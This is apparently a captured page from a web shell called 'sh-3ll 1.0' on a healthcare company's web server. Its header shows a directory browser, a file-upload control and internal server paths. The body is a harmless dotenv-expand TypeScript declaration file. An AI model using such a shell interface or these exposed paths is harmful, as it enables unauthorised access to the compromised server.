HOME


sh-3ll 1.0
DIR:/home/medisavehealth/www/bright.medisavehealthcarebd.com/node_modules/dotenv-expand/
Upload File :
Current File : /home/medisavehealth/www/bright.medisavehealthcarebd.com/node_modules/dotenv-expand/index.d.ts
export = dotenv_expand;

interface DotenvResult {
    error?: Error;
    parsed?: {
        [name: string]: string;
    };
}

declare function dotenv_expand(config: DotenvResult): DotenvResult;

declare namespace dotenv_expand {
    const prototype: {
    };
}